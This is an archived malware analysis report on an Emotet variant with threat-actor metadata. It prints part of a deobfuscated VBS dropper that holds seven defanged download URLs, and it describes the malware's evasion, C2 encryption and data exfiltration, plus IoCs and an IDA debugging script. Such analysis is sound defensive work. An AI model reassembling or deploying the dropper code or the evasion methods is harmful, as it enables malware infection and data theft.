{
	"id": "0fe83201-58ce-4d5a-801d-15060a952410",
	"created_at": "2026-04-06T00:07:28.091311Z",
	"updated_at": "2026-04-10T03:36:11.217866Z",
	"deleted_at": null,
	"sha1_hash": "6020231ec2c1e520f832e09880c58d12efe4c074",
	"title": "Emotet Malware Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3079847,
	"plain_text": "Emotet Malware Analysis\r\nArchived: 2026-04-05 17:24:47 UTC\r\nMalwareAnalysisSeries\r\nThis repository contains the analysis reports, technical details and any tools created to help with malware analysis.\r\nAdditionally, the repo contains extracted TTPs with code along with the detection rules.\r\nProject maintained by shaddy43, hosted on GitHub Pages\r\nEmotet is a sophisticated, modular form of malware that initially emerged as a banking Trojan in 2014 but has\r\nevolved over the years to become a highly prevalent and versatile threat. Known for its ability to deliver additional\r\nmalware payloads and act as a distributor for other cybercriminals, Emotet has established itself as one of the most\r\nnotorious forms of malware on the internet. Emotet operates primarily through phishing campaigns, often\r\nembedding malicious code in Word or Excel documents, or via links that, when clicked, initiate the malware’s\r\ndownload. Its worm-like features also enable it to spread rapidly across networks, making it an effective tool for\r\nlarge-scale cyberattacks.\r\nEmotet is linked to the threat actor called Wizard Spider, who is also known to operate other malware\r\ncampaigns like Trickbot and Ryuk ransomware. 
In this post, we will deeply analyze the latest Emotet variant\r\nemerging after the takedown and explain its internal workings and defense evasion tactics.\r\nStage 1: VBS Dropper\r\nThe initial dropper comes as either a malicious document containing a VBA macro or a standalone VBS script that is\r\nhighly obfuscated and downloads additional payloads onto the system, including the main Emotet DLL.\r\nhttps://shaddy43.github.io/MalwareAnalysisSeries/Emotet/\r\nPage 1 of 20\n\nTo debug the VBScript:\r\nSetup: Install Visual Studio with .NET tools\r\nCommand: cscript /x target_vbs\r\nDescription: It will automatically attach the VS Debugger to the script and add a breakpoint at the start\r\nThe first script extracts another VBS script saved as a .txt file in the %temp% directory and executes it as a VBS\r\nscript:\r\nSetup: Again debug the second script using Visual Studio\r\nCommand: cscript //E:vbscript /x extracted_script.txt\r\nDescription: It will treat the text file as a VBS script and execute it regardless of the extension\r\nI attached the debugger to the extracted second script in %temp% and started debugging. It is again deobfuscating the\r\nscript and executing it. 
The decoded script is as follows:\r\nDeobfuscated VBS\r\npublic romidu\r\nurlcount=1\r\nset fsobject=createobject(\"scripting.filesystemobject\")\r\ncurrentdir=fsobject.getparentfoldername(wscript.scriptfullname)\r\nset request=createobject(\"winhttp.winhttprequest.5.1\")\r\nset file=wscript.createobject(\"shell.application\")\r\nset strout=createobject(\"adodb.stream\")\r\nuseragent=\"mozilla/5.0 (windows nt 6.1; wow64; rv:58.0) gecko/20100101 firefox/58.0\"\r\nouch= chr(115-1)+\"e\"+\"gs\"\u0026\"v\"+chr(113+1)+\"3\"+\"2.\"+chr(101)+\"x\"+chr(101)+\" \" + \"\"\r\npat3= currentdir+\"\\\"+fsobject.gettempname+\".zip\"\r\nset triplett=createobject(\"wscript.shell\")\r\nurl1 = \"hxxp://erkaradyator.com.tr/Areas/1Dg2PeStqNlOjuPP3fu/\"\r\nurl2 = \"hxxps://sachininternational.com/wp-admin/ILVDnlmIATb8/\"\r\nurl3 = \"hxxps://esentai-gourmet.kz/404/5oe050kBsHedqng/\"\r\nurl4 = \"hxxp://ardena.pro/dqvoakrc/Hh9/\"\r\nurl5 = \"hxxp://panel.chatzy.in/k7daqAXFTBus7mkuwwC/UQ9Y8RRqoOQ9/\"\r\nurl6 = \"hxxp://toiaagrosciences1.hospedagemdesites.ws/grupotoia/CPKU5ZE/\"\r\nurl7 = \"hxxps://suppliercity.com.mx/wp-content/x0u6wST03y6X49MOq/\"\r\ndo\r\ndow\r\nloop while urlcount\u003c8\r\npublic function dow()\r\non error resume next\r\nselect case urlcount\r\ncase 1\r\ndownstr=url1\r\ncase 2\r\ndownstr=url2\r\ncase 3\r\ndownstr=url3\r\ncase 4\r\ndownstr=url4\r\ncase 5\r\ndownstr=url5\r\ncase 6\r\ndownstr=url6\r\ncase 7\r\ndownstr=url7\r\nend select\r\n...\r\n...\r\n...\r\ncensored !!!\r\nThe script then downloads payloads from the provided URLs and executes the next-stage malware, which\r\nis the Emotet DLL, using rundll32.exe. 
By the time of my analysis the C2 servers were not live, so I picked a separate\r\nEmotet DLL for further analysis.\r\nStage 2: Emotet DLL\r\nOnce the Emotet file is loaded by “rundll32.exe”, its entry point function is called first. It then calls\r\nthe DllMain() function, where it loads and decrypts a 32-bit DLL into its memory from a “Resource”. The\r\ndecrypted DLL is the core of this Emotet, which will be referred to as “X.dll” in this analysis due to a hardcoded\r\nconstant string.\r\nI use IDA Freeware (sometimes Pro) for disassembling and debugging most of the malware. I will debug the Emotet\r\nDLL using rundll32.exe. X.dll can be seen in the memory of the process using the Process Hacker tool. It can be\r\ndumped and unmapped using the pe_unmapper tool by hasherezade.\r\nThe flow of Emotet is as follows:\r\n“X.dll” checks if the export function name from the command line parameter is “Control_RunDLL”. If not, it\r\nruns the command line again with “Control_RunDLL” instead of some other export, like\r\n“C:\\Windows\\syswow64\\rundll32.exe emotet.dll,Control_RunDLL”. It then calls ExitProcess() to exit the first\r\n“rundll32.exe”. It uses the API CreateProcessW() to run the new command if the initial DLL has not been loaded with\r\nControl_RunDLL.\r\nWe can further use the dumped X.dll, rebase the program to match the one we are debugging\r\ncurrently, and map the exports to the functions that are being called as well. 
For example, call eax jumps to the export\r\nControl_RunDLL in X.dll, which is mapped in the following screenshot:\r\nI have created a function in the IDA database and renamed it Control_RunDLL_xdll for easier understanding.\r\nFrom here onwards, it will execute the core malicious functionality of the Emotet malware.\r\nThe main method for performing malicious functionality is highly obfuscated, with Emotet introducing “Control\r\nFlow Flattening”. The complexity of the control flow logic can be seen in the following control flow graph:\r\nFileless X.dll\r\nEmotet.dll, when started, loads X.dll from its resources. It is added as a malicious encrypted resource in bitmap format.\r\nOnce X.dll is decrypted and loaded into memory as an RWX region, it acts as the main malicious code. It has\r\nanti-analysis techniques like “control flow flattening”, “dynamic API calls”, “API hashing” and encrypted strings.\r\nI have not been able to find a working script that could unflatten this sample of Emotet. I have tried multiple\r\nresources like:\r\n# Links\r\n1 HexRaysDeob\r\n2 Sophos control flow de-flattening\r\n3 MODeflattener\r\nIn the end, I decided to go manual. 
I wrote a script that adds breakpoints on all call instructions in a specified\r\nfunction and used it on the main flattened function.\r\nimport idautils\r\nimport idaapi\r\nimport idc\r\n\r\ndef add_breakpoints_on_calls(func_name):\r\n    # Get the function address by name\r\n    func_ea = idc.get_name_ea_simple(func_name)\r\n    if func_ea == idc.BADADDR:\r\n        print(f\"Function {func_name} not found!\")\r\n        return\r\n\r\n    # Get the function object, which carries its start and end address\r\n    func = idaapi.get_func(func_ea)\r\n    if not func:\r\n        print(f\"Function {func_name} not found!\")\r\n        return\r\n\r\n    # Iterate through the instructions in the function\r\n    for head in idautils.Heads(func.start_ea, func.end_ea):\r\n        # Check if it's a call instruction\r\n        if idc.print_insn_mnem(head) == \"call\":\r\n            # Add a breakpoint at the call instruction\r\n            idc.add_bpt(head)\r\n            print(f\"Breakpoint added at 0x{head:x}\")\r\n\r\n    print(f\"Breakpoints added on all call instructions in function: {func_name}\")\r\n\r\n# Example: specify the function name where you want to add breakpoints\r\nadd_breakpoints_on_calls(\"Flatten_func\")  # Flatten_func is the control flow flattening function that I renamed\r\nI then continued debugging until something suspicious came my way, instead of stepping through the code line by line.\r\nThe call instructions can be used to track the API calls even if the binary is obfuscated or resolves APIs\r\ndynamically.\r\nString De-obfuscation\r\nAll strings in X.dll (Emotet in memory) are encrypted and are decrypted at run-time. 
It decrypts the names of all\r\nadditional libraries that are loaded by the malware.\r\nThe following list of modules is loaded for further activities:\r\n# Modules\r\n1 Advapi32.dll\r\n2 Crypt32.dll\r\n3 Urlmon.dll\r\n4 iertutil.dll\r\n5 srvcli.dll\r\n6 netutils.dll\r\n7 userenv.dll\r\n8 wininet.dll\r\n9 wtsapi32.dll\r\n10 bcrypt.dll\r\n11 propsys.dll\r\n12 WS2_32.dll\r\nDynamic API Resolution \u0026 API Hashing\r\nAll APIs are resolved dynamically to avoid detection in static analysis. In the above example, we saw the string\r\n“advapi32.dll” being decrypted. In this function, it will be loaded using the API “LoadLibraryW” and executed.\r\nThe function “resolve_func” is responsible for resolving API hashes and returning API addresses after comparing\r\nhashes.\r\nIt is renamed for easier understanding.\r\nFrom here onwards all APIs are resolved using API hashing and executed. I will focus on providing the major\r\nTTPs and APIs that it uses instead of providing a complete API trace in this article.\r\nMove to secure location\r\nThe first thing it checks is the command line parameter, to see if the DLL has been executed with the parameter\r\nControl_RunDLL, and the path from where it is executed. 
If the malware is not executed from %AppData%,\r\nit moves itself to a secure location in %AppData%.\r\nThe malware uses the following sequence of APIs:\r\n# APIs Description\r\n1 SHGetFolderPathW To get the path of %AppData%\r\n2 GetCommandLineW To check command line parameters and path\r\n3 CreateFileW To get its own handle\r\n4 GetFileInformationByHandleEx To get its own information\r\n5 GetTickCount To generate a random name\r\n6 SHFileOperationW To copy the file\r\n7 DeleteFileW To delete the zone identifier on the copied file\r\nThe screenshots for the above-mentioned task are provided below:\r\nAfter the malware has been moved to a different location, it executes itself again with rundll32.exe, which in turn\r\ndeletes the original file. The APIs used for executing itself again are as follows:\r\n# APIs Description\r\n1 CreateProcessW Emotet is executed again with the newly saved DLL present in %AppData% using rundll32\r\n2 ExitProcess Exits the first process\r\nThe behavior of Emotet changes depending on the location from where it is executed. If it is executed from\r\n%AppData%, it proceeds further in its execution, but if it is executed from any other path it changes its location\r\nand reloads itself again.\r\nInformation Discovery\r\nThe last stage copied emotet.dll into the %AppData% local folder with a random folder name and file name with\r\nthe added extension .xnj. In this phase, I will again execute the DLL using rundll32 with the parameter\r\nControl_RunDLL and debug its behavior further.\r\nIt started with the usual PEB walk to find the kernel32 and ntdll locations and the addresses of LoadLibraryW and\r\nGetProcAddress. Then it loaded all the modules that it needs and first checked the executing file path and module\r\nname. 
If everything is correct, it then gathers system information for crafting the request and registering the bot with the C2\r\nserver.\r\n# APIs Description\r\n1 GetComputerNameA To get the name of the victim system\r\n2 GetWindowsDirectoryW To get the Windows directory where system files are installed\r\n3 GetVolumeInformationW To get the volume information\r\nA unique behavior of Emotet was seen when it tries to delete all extra files present in its home directory in\r\n%AppData%. It deletes every other file in its directory other than the main Emotet DLL. This could be one of its\r\nanti-analysis techniques, deleting debugger or disassembler database files, as in the case of IDA (IDA creates its database\r\nin the same directory as the file being analyzed).\r\nAs shown in the screenshot above, it is trying to delete the IDA file named cdomcinc.xnj.id0. I might have to patch\r\nthe program to avoid deleting these files, otherwise it would corrupt my IDA database.\r\nI patched the bytes of the call to the DeleteFileW API with NOP instructions and continued. It now skips all my important\r\nfiles and moves on.\r\nEstablishing Encryption Keys\r\nEmotet uses Elliptic Curve Cryptography (ECDH) keys for establishing encryption keys. The generated ECDH\r\nprivate key and the embedded ECDH public key are used with the BCryptSecretAgreement function to generate a\r\nshared secret between the malware and the C2. 
The AES key is derived from the shared secret using the\r\nBCryptDeriveKey function.\r\nThe trace of API calls for establishing these keys is as follows:\r\n# APIs\r\n1 BCryptGenerateKeyPair\r\n2 BCryptFinalizeKeyPair\r\n3 BCryptExportKey\r\n4 BCryptImportKeyPair\r\n5 BCryptSecretAgreement\r\n6 BCryptOpenAlgorithmProvider\r\n7 BCryptDeriveKey\r\n8 BCryptGetProperty\r\n9 BCryptImportKey\r\n10 BCryptCloseAlgorithmProvider\r\n11 BCryptDestroySecret\r\n12 BCryptDestroyKey\r\n13 BCryptDestroyKey\r\n14 BCryptCloseAlgorithmProvider\r\nCrafting 1st Request Packet\r\nEmotet crafts the 1st request for registering the bot with the C2 server by combining the host data that it discovered,\r\nencoding/encrypting the data with the derived encryption keys and sending it over HTTP.\r\nIt gathers the desktop name and a hash of the MAC address\r\nIt gathers the path of Windows\r\nIt gathers the information of the volumes\r\nIt appends all these together, separating the string with ” ; “ after each element. The string is then encoded and\r\nencrypted as follows:\r\n# APIs\r\n1 BCryptOpenAlgorithmProvider\r\n2 BCryptGetProperty\r\n3 BCryptCreateHash\r\n4 BCryptHashData\r\n5 BCryptFinishHash\r\n6 BCryptDestroyHash\r\n7 BCryptCloseAlgorithmProvider\r\n8 BCryptEncrypt\r\n9 BCryptEncrypt\r\n10 CryptBinaryToStringW\r\n11 CryptBinaryToStringW\r\nC2 Communication Over HTTP\r\nThis sample of Emotet uses WinINet APIs for sending malicious requests and getting the response. It uses GET and\r\nPOST requests, with data being sent in a Cookie header. For larger data it uses POST requests; otherwise it mainly\r\nuses GET requests. 
I have set up a netcat listener on my REMnux box to receive the request, even though it can’t\r\ndecrypt and display the data.\r\nThe URI is randomly generated and data is encrypted in the Cookie header (a POST request is used for larger\r\namounts of data). The Cookie header contains a randomly generated key name and base64 encoded key value.\r\nOnce decoded, the key value contains:\r\ngenerated ECDH public key\r\nAES encrypted request data\r\nRandom bytes\r\nThe AES key used to encrypt request data is generated via the following method:\r\nThe generated ECDH private key and embedded ECDH public key are used with the\r\nBCryptSecretAgreement function to generate a shared secret between the malware and C2\r\nThe AES key is derived from the shared secret using the BCryptDeriveKey function\r\nFrom https://www.zscaler.com/blogs/security-research/return-emotet-malware-analysis\r\n# APIs\r\n1 InternetOpenW\r\n2 InternetConnectW\r\n3 HttpOpenRequestW\r\n4 InternetSetOptionW\r\n5 InternetQueryOptionW\r\n6 InternetSetOptionW\r\n7 HttpSendRequestW\r\nThe malware will be stuck in the loop here until a response is received from the C2 server. After getting the response, it\r\ncan further download additional malware or modules into itself, like the Outlook credential stealer module, spam\r\nmodule, browser stealer module or lateral movement. 
Each module is a separate obfuscated DLL that is downloaded\r\ninto the home directory and performs additional malicious tasks.\r\nIoCs\r\nUrls\r\nhxxp://erkaradyator.com.tr/Areas/1Dg2PeStqNlOjuPP3fu/\r\nhxxps://sachininternational.com/wp-admin/ILVDnlmIATb8/\r\nhxxps://esentai-gourmet.kz/404/5oe050kBsHedqng/\r\nhxxp://ardena.pro/dqvoakrc/Hh9/\r\nhxxp://panel.chatzy.in/k7daqAXFTBus7mkuwwC/UQ9Y8RRqoOQ9/\r\nhxxp://toiaagrosciences1.hospedagemdesites.ws/grupotoia/CPKU5ZE/\r\nhxxps://suppliercity.com.mx/wp-content/x0u6wST03y6X49MOq/\r\nHashes\r\n31fb4bf411dcd7fcb860bdb1db26859290b047b39b94638a7d4fd2a46d323e98\r\nc7574aac7583a5bdc446f813b8e347a768a9f4af858404371eae82ad2d136a01\r\n5adc217c3f1fa072c40ae7ebb5f3735399e0cdd6e1add360690fb8f8fed75ceb\r\nNOTE: All samples, scripts and tools are available in my GitHub repository.\r\nSource: https://shaddy43.github.io/MalwareAnalysisSeries/Emotet/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://shaddy43.github.io/MalwareAnalysisSeries/Emotet/"
	],
	"report_names": [
		"Emotet"
	],
	"threat_actors": [
		{
			"id": "f6f91e1c-9202-4497-bf22-9cd5ef477600",
			"created_at": "2023-01-06T13:46:38.86765Z",
			"updated_at": "2026-04-10T02:00:03.12735Z",
			"deleted_at": null,
			"main_name": "WIZARD SPIDER",
			"aliases": [
				"TEMP.MixMaster",
				"GOLD BLACKBURN",
				"DEV-0193",
				"UNC2053",
				"Pistachio Tempest",
				"DEV-0237",
				"Storm-0230",
				"FIN12",
				"Periwinkle Tempest",
				"Storm-0193",
				"Trickbot LLC"
			],
			"source_name": "MISPGALAXY:WIZARD SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e",
			"created_at": "2024-06-04T02:03:07.799286Z",
			"updated_at": "2026-04-10T02:00:03.606456Z",
			"deleted_at": null,
			"main_name": "GOLD BLACKBURN",
			"aliases": [
				"ITG23 ",
				"Periwinkle Tempest ",
				"Wizard Spider "
			],
			"source_name": "Secureworks:GOLD BLACKBURN",
			"tools": [
				"BazarLoader",
				"Buer Loader",
				"Bumblebee",
				"Dyre",
				"Team9",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3",
			"created_at": "2022-10-25T16:07:24.422115Z",
			"updated_at": "2026-04-10T02:00:04.983298Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"DEV-0193",
				"G0102",
				"Gold Blackburn",
				"Gold Ulrick",
				"Grim Spider",
				"ITG23",
				"Operation BazaFlix",
				"Periwinkle Tempest",
				"Storm-0230",
				"TEMP.MixMaster",
				"Wizard Spider"
			],
			"source_name": "ETDA:Wizard Spider",
			"tools": [
				"AdFind",
				"Agentemis",
				"Anchor_DNS",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"Conti",
				"Diavol",
				"Dyranges",
				"Dyre",
				"Dyreza",
				"Dyzap",
				"Gophe",
				"Invoke-SMBAutoBrute",
				"KEGTAP",
				"LaZagne",
				"LightBot",
				"PowerSploit",
				"PowerTrick",
				"PsExec",
				"Ryuk",
				"SessionGopher",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"TrickMo",
				"Upatre",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434048,
	"ts_updated_at": 1775792171,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6020231ec2c1e520f832e09880c58d12efe4c074.pdf",
		"text": "https://archive.orkl.eu/6020231ec2c1e520f832e09880c58d12efe4c074.txt",
		"img": "https://archive.orkl.eu/6020231ec2c1e520f832e09880c58d12efe4c074.jpg"
	}
}